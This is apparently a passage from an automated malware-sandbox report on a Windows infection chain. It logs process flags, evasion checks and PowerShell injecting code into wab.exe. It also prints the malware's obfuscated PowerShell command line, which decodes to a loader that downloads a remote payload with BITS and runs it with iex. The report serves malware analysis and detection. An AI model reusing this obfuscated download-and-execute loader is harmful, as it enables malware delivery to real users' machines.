                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 499AF44
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                      Source: C:\Windows\SysWOW64\dialer.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                      Source: C:\Windows\SysWOW64\dialer.exeAPI/Special instruction interceptor: Address: 53F483A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5256Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4644Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6093Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3635Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7932Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep count: 6093 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep count: 3635 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\dialer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: svchost.exe, 00000005.00000002.2612726762.000001F91DA40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2612780417.000001F91DA54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2611045679.000001F91842B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.1771543069.0000000007528000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.1771543069.0000000007581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\dialer.exeCode function: 10_3_02CA027F mov eax, dword ptr fs:[00000030h]10_3_02CA027F

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3AF0000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 287FA38Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Opinions ($Sold){For($Peder=7; $Peder -lt $Sold.Length-1; $Peder+=8){ $Becifr20+=$Sold.Substring($Peder, 1);}$Becifr20;}$Becifr2001=Opinions 'Udkonkuirecomple ChilidxClubbin ';$Becifr2002=Opinions 'MetreneTSkryderrFokusera Nonappn BuckarsAldehydfCitatioe StupidrTrykkerrFollicuiForkontn Inddelg Ghostl ';function Folkemund ($Kvke){& ($Becifr2001) ($Kvke);}$Eksped=Opinions ' Splitfhhighbrot QuerimtMyrsiphpAymissasTrilloe:Hjemmeh/ Artens/Crescogwbevogtew UnpanewTristra. Vokslya GodkensbedeviltErgograeFiligranPlanlgntEmhtteoeDennisgrHuldsagpNiveauorInsectoiValentisInspmiseRrigeresFudderl.Infantec SkabekoHeliconmSkillev.Raderinp MaaneskUpaavir/Starkesm KolonisAlungar/ BabkasNBastideoFoedselnIndtgtsn Atombo2svogers1 Duelbe5aabenhe.MetrummpPapirperDesignlmWorsset ';$Becifr2000=Opinions 'Buldogg$PsychoagSaxofonl ThrobloAfhuggcbTrichopa Roduddl Bighte:UnthroaT EmbrasaLissomncKeglestktombololSolutioe OverrosTjenestsKvllereeErklaer2 Pastic2Tilsprg1Ohmensd8Afsvkke Hmskoen=Diacety PrivateSBeneceptPentaplaHvedomrrMerotomtReserve-ReductiBReautheiMegaloctAffixiasFinlndeTushabtirIntrabraKompagnnMaimonisKavalerfSekundoeOcotillrPatrulj Daadyre-OutdegrSMindedioSteropeuEnnoblerproportcFornrmee Gaases Inhomog$TripennEGelatinkParoxyssLommenspGropedoePilenhjdMonopol mellemm-PastoraDBrndboreForfrersUnderfotHurtigri geissonFlabbieaPeculiatUnfeliniMusicaloFeminolnVuggevi Engarba$TekstreTBolsjevaFilmfrocFlinchekWindsurlGumpekaeCustomisSvirrefsOprikkee Datako2Svingni2 System1Gracise2 Memora ';Folkemund (Opinions 